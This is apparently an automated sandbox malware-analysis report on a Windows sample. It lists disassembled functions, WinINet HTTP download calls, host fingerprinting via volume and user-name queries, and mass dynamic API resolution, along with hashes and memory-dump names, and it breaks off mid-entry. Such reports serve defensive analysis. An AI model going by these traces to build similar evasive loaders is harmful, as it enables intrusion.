Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                        • API String ID: 1542196881-2218711628
                                        • Opcode ID: 0f2632cb7f1fe0cd7758ef2eadb8621a0113e77f7d98eeb81bd5b03e087cd2e0
                                        • Instruction ID: 27fa05fafe1547a498a64e34ad4bc57587c3a13ed963a281c08b826322ca834f
                                        • Opcode Fuzzy Hash: 0f2632cb7f1fe0cd7758ef2eadb8621a0113e77f7d98eeb81bd5b03e087cd2e0
                                        • Instruction Fuzzy Hash: ED41E2A87C66067EE728B7ACA8EDEDF76675FD7708F505844AC08522C2CBF095404627
                                        Function 001862D0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1033 1862d0-18635b call 19aab0 call 184800 call 19aa50 InternetOpenA StrCmpCA 1040 18635d 1033->1040 1041 186364-186368 1033->1041 1040->1041 1042 186559-186575 call 19aab0 call 19ab10 * 2 1041->1042 1043 18636e-186392 InternetConnectA 1041->1043 1062 186578-18657d 1042->1062 1045 186398-18639c 1043->1045 1046 18654f-186553 InternetCloseHandle 1043->1046 1048 1863aa 1045->1048 1049 18639e-1863a8 1045->1049 1046->1042 1051 1863b4-1863e2 HttpOpenRequestA 1048->1051 1049->1051 1053 1863e8-1863ec 1051->1053 1054 186545-186549 InternetCloseHandle 1051->1054 1056 1863ee-18640f InternetSetOptionA 1053->1056 1057 186415-186455 HttpSendRequestA HttpQueryInfoA 1053->1057 1054->1046 1056->1057 1058 18647c-18649b call 198ad0 1057->1058 1059 186457-186477 call 19aa50 call 19ab10 * 2 1057->1059 1067 186519-186539 call 19aa50 call 19ab10 * 2 1058->1067 1068 18649d-1864a4 1058->1068 1059->1062 1067->1062 1071 1864a6-1864d0 InternetReadFile 1068->1071 1072 186517-18653f InternetCloseHandle 1068->1072 1076 1864db 1071->1076 1077 1864d2-1864d9 1071->1077 1072->1054 1076->1072 1077->1076 1080 1864dd-186515 call 19acc0 call 19abb0 call 19ab10 1077->1080 1080->1071
                                        APIs
                                          • Part of subcall function 0019AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0019AAF6
                                          • Part of subcall function 00184800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00184889
                                          • Part of subcall function 00184800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00184899
                                          • Part of subcall function 0019AA50: lstrcpy.KERNEL32(001A0E1A,00000000), ref: 0019AA98
                                        • InternetOpenA.WININET(001A0DFF,00000001,00000000,00000000,00000000), ref: 00186331
                                        • StrCmpCA.SHLWAPI(?,011CE938), ref: 00186353
                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00186385
                                        • HttpOpenRequestA.WININET(00000000,GET,?,011CE398,00000000,00000000,00400100,00000000), ref: 001863D5
                                        • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0018640F
                                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00186421
                                        • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 0018644D
                                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 001864BD
                                        • InternetCloseHandle.WININET(00000000), ref: 0018653F
                                        • InternetCloseHandle.WININET(00000000), ref: 00186549
                                        • InternetCloseHandle.WININET(00000000), ref: 00186553
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                        • String ID: ERROR$ERROR$GET
                                        • API String ID: 3749127164-2509457195
                                        • Opcode ID: ceec566abbd4d99fdb9423f1b4f452824f0fb7b141c29c947e5ce2902bd8e5d5
                                        • Instruction ID: c5a36f71bae3e2f4bd82862b3284c1d038b503c723d899ad1b19760188b50f30
                                        • Opcode Fuzzy Hash: ceec566abbd4d99fdb9423f1b4f452824f0fb7b141c29c947e5ce2902bd8e5d5
                                        • Instruction Fuzzy Hash: C4715E71A00218ABDF24EFA0DC55BEE7779BF44700F5081A8F50A6B190DBB46A84CF95
                                        Function 00197690 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1356 197690-1976da GetWindowsDirectoryA 1357 1976dc 1356->1357 1358 1976e3-197757 GetVolumeInformationA call 198e90 * 3 1356->1358 1357->1358 1365 197768-19776f 1358->1365 1366 19778c-1977a7 GetProcessHeap RtlAllocateHeap 1365->1366 1367 197771-19778a call 198e90 1365->1367 1368 1977a9-1977b6 call 19aa50 1366->1368 1369 1977b8-1977e8 wsprintfA call 19aa50 1366->1369 1367->1365 1377 19780e-19781e 1368->1377 1369->1377
                                        APIs
                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 001976D2
                                        • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0019770F
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00197793
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 0019779A
                                        • wsprintfA.USER32 ref: 001977D0
                                          • Part of subcall function 0019AA50: lstrcpy.KERNEL32(001A0E1A,00000000), ref: 0019AA98
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                        • String ID: :$C$\
                                        • API String ID: 1544550907-3809124531
                                        • Opcode ID: deb55415c205c01f98e54ace0587731a4e2851597b09b7f32bc61e3c7a237989
                                        • Instruction ID: 913fe7c8096eedbddc9a7bc6a41f451ca7a41cd618b6750517a7991201ea4d0a
                                        • Opcode Fuzzy Hash: deb55415c205c01f98e54ace0587731a4e2851597b09b7f32bc61e3c7a237989
                                        • Instruction Fuzzy Hash: BE41D6B1D04348EBDF10DF94DC85BDEBBB8AF19700F1040A8F609AB281D774AA44CBA5
                                        Function 001979E0 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001811B7), ref: 00197A10
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00197A17
                                        • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00197A2F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateNameProcessUser
                                        • String ID:
                                        • API String ID: 1296208442-0
                                        • Opcode ID: 7f61f03a958e7c56641c37fa3ed0b7ebb2d77c6c07aa64626f15d7f1e5580ee1
                                        • Instruction ID: 2cacf0e72f1cab66aa74f6c59cbfb30b39ae733c0d555a56adda0b7202abaa8e
                                        • Opcode Fuzzy Hash: 7f61f03a958e7c56641c37fa3ed0b7ebb2d77c6c07aa64626f15d7f1e5580ee1
                                        • Instruction Fuzzy Hash: B1F04FB1948309EBCB04DF98ED45BAEBBB8EB05711F10026AF615A3680C7755900CBA1
                                        Function 00181160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExitInfoProcessSystem
                                        • String ID:
                                        • API String ID: 752954902-0
                                        • Opcode ID: 5c3d6d49de4fc0a5472708a4832a4b56e00d81fbc0e46f4fc3c9c6e8e32b5387
                                        • Instruction ID: aa7f05b17e04610c01d49a210101918126036b8e4e415ac32997c20ece9711fa
                                        • Opcode Fuzzy Hash: 5c3d6d49de4fc0a5472708a4832a4b56e00d81fbc0e46f4fc3c9c6e8e32b5387
                                        • Instruction Fuzzy Hash: 86D09E7590430CABCB04EFE0A9896EDBB78BB08616F100565DD0562341EB319595CB69
                                        Function 00199F20 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 633 199f20-199f2a 634 199f30-19a341 GetProcAddress * 43 633->634 635 19a346-19a3da LoadLibraryA * 8 633->635 634->635 636 19a3dc-19a451 GetProcAddress * 5 635->636 637 19a456-19a45d 635->637 636->637 638 19a463-19a521 GetProcAddress * 8 637->638 639 19a526-19a52d 637->639 638->639 640 19a5a8-19a5af 639->640 641 19a52f-19a5a3 GetProcAddress * 5 639->641 642 19a5b5-19a642 GetProcAddress * 6 640->642 643 19a647-19a64e 640->643 641->640 642->643 644 19a72f-19a736 643->644 645 19a654-19a72a GetProcAddress * 9 643->645 646 19a738-19a7ad GetProcAddress * 5 644->646 647 19a7b2-19a7b9 644->647 645->644 646->647 648 19a7bb-19a7e7 GetProcAddress * 2 647->648 649 19a7ec-19a7f3 647->649 648->649 650 19a825-19a82c 649->650 651 19a7f5-19a820 GetProcAddress * 2 649->651 652 19a922-19a929 650->652 653 19a832-19a91d GetProcAddress * 10 650->653 651->650 654 19a92b-19a988 GetProcAddress * 4 652->654 655 19a98d-19a994 652->655 653->652 654->655 656 19a9ae-19a9b5 655->656 657 19a996-19a9a9 GetProcAddress 655->657 658 19aa18-19aa19 656->658 659 19a9b7-19aa13 GetProcAddress * 4 656->659 657->656 659->658
                                        APIs
                                        • GetProcAddress.KERNEL32(74DD0000,011B5850), ref: 00199F3D
                                        • GetProcAddress.KERNEL32(74DD0000,011B58D0), ref: 00199F55
                                        • GetProcAddress.KERNEL32(74DD0000,011C9670), ref: 00199F6E
                                        • GetProcAddress.KERNEL32(74DD0000,011C9628), ref: 00199F86
                                        • GetProcAddress.KERNEL32(74DD0000,011C96D0), ref: 00199F9E
                                        • GetProcAddress.KERNEL32(74DD0000,011C9658), ref: 00199FB7
                                        • GetProcAddress.KERNEL32(74DD0000,011BB6F8), ref: 00199FCF
                                        • GetProcAddress.KERNEL32(74DD0000,011CD110), ref: 00199FE7
                                        • GetProcAddress.KERNEL32(74DD0000,011CD128), ref: 0019A000
                                        • GetProcAddress.KERNEL32(74DD0000,011CD368), ref: 0019A018
                                        • GetProcAddress.KERNEL32(74DD0000,011CD398), ref: 0019A030
                                        • GetProcAddress.KERNEL32(74DD0000,011B5870), ref: 0019A049
                                        • GetProcAddress.KERNEL32(74DD0000,011B58F0), ref: 0019A061
                                        • GetProcAddress.KERNEL32(74DD0000,011B5A30), ref: 0019A079
                                        • GetProcAddress.KERNEL32(74DD0000,011B59F0), ref: 0019A092
                                        • GetProcAddress.KERNEL32(74DD0000,011CD3B0), ref: 0019A0AA
                                        • GetProcAddress.KERNEL32(74DD0000,011CD140), ref: 0019A0C2
                                        • GetProcAddress.KERNEL32(74DD0000,011BB8D8), ref: 0019A0DB
                                        • GetProcAddress.KERNEL32(74DD0000,011B5A50), ref: 0019A0F3
                                        • GetProcAddress.KERNEL32(74DD0000,011CD3C8), ref: 0019A10B
                                        • GetProcAddress.KERNEL32(74DD0000,011CD158), ref: 0019A124
                                        • GetProcAddress.KERNEL32(74DD0000,011CD2D8), ref: 0019A13C
                                        • GetProcAddress.KERNEL32(74DD0000,011CD1E8), ref: 0019A154
                                        • GetProcAddress.KERNEL32(74DD0000,011B5910), ref: 0019A16D
                                        • GetProcAddress.KERNEL32(74DD0000,011CD260), ref: 0019A185
                                        • GetProcAddress.KERNEL32(74DD0000,011CD230), ref: 0019A19D
                                        • GetProcAddress.KERNEL32(74DD0000,011CD338), ref: 0019A1B6
                                        • GetProcAddress.KERNEL32(74DD0000,011CD3E0), ref: 0019A1CE
                                        • GetProcAddress.KERNEL32(74DD0000,011CD380), ref: 0019A1E6
                                        • GetProcAddress.KERNEL32(74DD0000,011CD278), ref: 0019A1FF
                                        • GetProcAddress.KERNEL32(74DD0000,011CD248), ref: 0019A217
                                        • GetProcAddress.KERNEL32(74DD0000,011CD200), ref: 0019A22F
                                        • GetProcAddress.KERNEL32(74DD0000,011CD170), ref: 0019A248
                                        • GetProcAddress.KERNEL32(74DD0000,011CA720), ref: 0019A260
                                        • GetProcAddress.KERNEL32(74DD0000,011CD1A0), ref: 0019A278
                                        • GetProcAddress.KERNEL32(74DD0000,011CD188), ref: 0019A291
                                        • GetProcAddress.KERNEL32(74DD0000,011B5990), ref: 0019A2A9
                                        • GetProcAddress.KERNEL32(74DD0000,011CD2F0), ref: 0019A2C1
                                        • GetProcAddress.KERNEL32(74DD0000,011B59D0), ref: 0019A2DA
                                        • GetProcAddress.KERNEL32(74DD0000,011CD1B8), ref: 0019A2F2
                                        • GetProcAddress.KERNEL32(74DD0000,011CD1D0), ref: 0019A30A
                                        • GetProcAddress.KERNEL32(74DD0000,011B5A90), ref: 0019A323
                                        • GetProcAddress.KERNEL32(74DD0000,011B5E30), ref: 0019A33B
                                        • LoadLibraryA.KERNEL32(011CD0F8,?,00195EF3,001A0AEB,?,?,?,?,?,?,?,?,?,?,001A0AEA,001A0AE7), ref: 0019A34D
                                        • LoadLibraryA.KERNEL32(011CD218,?,00195EF3,001A0AEB,?,?,?,?,?,?,?,?,?,?,001A0AEA,001A0AE7), ref: 0019A35E
                                        • LoadLibraryA.KERNEL32(011CD290,?,00195EF3,001A0AEB,?,?,?,?,?,?,?,?,?,?,001A0AEA,001A0AE7), ref: 0019A370
                                        • LoadLibraryA.KERNEL32(011CD2A8,?,00195EF3,001A0AEB,?,?,?,?,?,?,?,?,?,?,001A0AEA,001A0AE7), ref: 0019A382
                                        • LoadLibraryA.KERNEL32(011CD2C0,?,00195EF3,001A0AEB,?,?,?,?,?,?,?,?,?,?,001A0AEA,001A0AE7), ref: 0019A393
                                        • LoadLibraryA.KERNEL32(011CD308,?,00195EF3,001A0AEB,?,?,?,?,?,?,?,?,?,?,001A0AEA,001A0AE7), ref: 0019A3A5
                                        • LoadLibraryA.KERNEL32(011CD320,?,00195EF3,001A0AEB,?,?,?,?,?,?,?,?,?,?,001A0AEA,001A0AE7), ref: 0019A3B7
                                        • LoadLibraryA.KERNEL32(011CD350,?,00195EF3,001A0AEB,?,?,?,?,?,?,?,?,?,?,001A0AEA,001A0AE7), ref: 0019A3C8
                                        • GetProcAddress.KERNEL32(75290000,011B5AB0), ref: 0019A3EA
                                        • GetProcAddress.KERNEL32(75290000,011CD4E8), ref: 0019A402
                                        • GetProcAddress.KERNEL32(75290000,011C9098), ref: 0019A41A
                                        • GetProcAddress.KERNEL32(75290000,011CD470), ref: 0019A433
                                        • GetProcAddress.KERNEL32(75290000,011B5B50), ref: 0019A44B
                                        • GetProcAddress.KERNEL32(73440000,011BB9A0), ref: 0019A470
                                        • GetProcAddress.KERNEL32(73440000,011B5AF0), ref: 0019A489
                                        • GetProcAddress.KERNEL32(73440000,011BB9C8), ref: 0019A4A1
                                        • GetProcAddress.KERNEL32(73440000,011CD548), ref: 0019A4B9
                                        • GetProcAddress.KERNEL32(73440000,011CD3F8), ref: 0019A4D2
                                        • GetProcAddress.KERNEL32(73440000,011B5D50), ref: 0019A4EA
                                        • GetProcAddress.KERNEL32(73440000,011B5D90), ref: 0019A502
                                        • GetProcAddress.KERNEL32(73440000,011CD578), ref: 0019A51B
                                        • GetProcAddress.KERNEL32(752C0000,011B5B30), ref: 0019A53C
                                        • GetProcAddress.KERNEL32(752C0000,011B5AD0), ref: 0019A554
                                        • GetProcAddress.KERNEL32(752C0000,011CD590), ref: 0019A56D
                                        • GetProcAddress.KERNEL32(752C0000,011CD428), ref: 0019A585
                                        • GetProcAddress.KERNEL32(752C0000,011B5B90), ref: 0019A59D
                                        • GetProcAddress.KERNEL32(74EC0000,011BB680), ref: 0019A5C3
                                        • GetProcAddress.KERNEL32(74EC0000,011BB720), ref: 0019A5DB
                                        • GetProcAddress.KERNEL32(74EC0000,011CD4D0), ref: 0019A5F3
                                        • GetProcAddress.KERNEL32(74EC0000,011B5CF0), ref: 0019A60C
                                        • GetProcAddress.KERNEL32(74EC0000,011B5E10), ref: 0019A624
                                        • GetProcAddress.KERNEL32(74EC0000,011BB748), ref: 0019A63C
                                        • GetProcAddress.KERNEL32(75BD0000,011CD488), ref: 0019A662
                                        • GetProcAddress.KERNEL32(75BD0000,011B5C90), ref: 0019A67A
                                        • GetProcAddress.KERNEL32(75BD0000,011C8FE8), ref: 0019A692
                                        • GetProcAddress.KERNEL32(75BD0000,011CD4A0), ref: 0019A6AB
                                        • GetProcAddress.KERNEL32(75BD0000,011CD530), ref: 0019A6C3
                                        • GetProcAddress.KERNEL32(75BD0000,011B5B10), ref: 0019A6DB
                                        • GetProcAddress.KERNEL32(75BD0000,011B5BD0), ref: 0019A6F4
                                        • GetProcAddress.KERNEL32(75BD0000,011CD410), ref: 0019A70C
                                        • GetProcAddress.KERNEL32(75BD0000,011CD500), ref: 0019A724
                                        • GetProcAddress.KERNEL32(75A70000,011B5CD0), ref: 0019A746
                                        • GetProcAddress.KERNEL32(75A70000,011CD440), ref: 0019A75E
                                        • GetProcAddress.KERNEL32(75A70000,011CD560), ref: 0019A776
                                        • GetProcAddress.KERNEL32(75A70000,011CD5A8), ref: 0019A78F
                                        • GetProcAddress.KERNEL32(75A70000,011CD458), ref: 0019A7A7
                                        • GetProcAddress.KERNEL32(75450000,011B5D10), ref: 0019A7C8
                                        • GetProcAddress.KERNEL32(75450000,011B5E50), ref: 0019A7E1
                                        • GetProcAddress.KERNEL32(75DA0000,011B5B70), ref: 0019A802
                                        • GetProcAddress.KERNEL32(75DA0000,011CD4B8), ref: 0019A81A
                                        • GetProcAddress.KERNEL32(6F070000,011B5C70), ref: 0019A840
                                        • GetProcAddress.KERNEL32(6F070000,011B5BF0), ref: 0019A858
                                        • GetProcAddress.KERNEL32(6F070000,011B5DB0), ref: 0019A870
                                        • GetProcAddress.KERNEL32(6F070000,011CD518), ref: 0019A889
                                        • GetProcAddress.KERNEL32(6F070000,011B5BB0), ref: 0019A8A1
                                        • GetProcAddress.KERNEL32(6F070000,011B5CB0), ref: 0019A8B9
                                        • GetProcAddress.KERNEL32(6F070000,011B5C10), ref: 0019A8D2
                                        • GetProcAddress.KERNEL32(6F070000,011B5C30), ref: 0019A8EA
                                        • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 0019A901
                                        • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 0019A917
                                        • GetProcAddress.KERNEL32(75AF0000,011CD080), ref: 0019A939
                                        • GetProcAddress.KERNEL32(75AF0000,011C9048), ref: 0019A951
                                        • GetProcAddress.KERNEL32(75AF0000,011CD008), ref: 0019A969
                                        • GetProcAddress.KERNEL32(75AF0000,011CD0C8), ref: 0019A982
                                        • GetProcAddress.KERNEL32(75D90000,011B5D30), ref: 0019A9A3
                                        • GetProcAddress.KERNEL32(6E330000,011CCF60), ref: 0019A9C4
                                        • GetProcAddress.KERNEL32(6E330000,011B5DD0), ref: 0019A9DD
                                        • GetProcAddress.KERNEL32(6E330000,011CD020), ref: 0019A9F5
                                        • GetProcAddress.KERNEL32(6E330000,011CCED0), ref: 0019AA0D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$LibraryLoad
                                        • String ID: HttpQueryInfoA$InternetSetOptionA
                                        • API String ID: 2238633743-1775429166
                                        • Opcode ID: c655fac3673028f2bb5040aaee1446641f370befd55c62e0d88a2d7788b61a8c
                                        • Instruction ID: 3d33b09ff728ac4f55fac6de7997f8060ddb4ffd3728b5a792d5368dfe25fb29
                                        • Opcode Fuzzy Hash: c655fac3673028f2bb5040aaee1446641f370befd55c62e0d88a2d7788b61a8c
                                        • Instruction Fuzzy Hash: 2F623CB5619700AFC344DFA8FC889567BB9A74D703751867ABA09C3372DB34E940CB68
                                        Function 001848D0 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
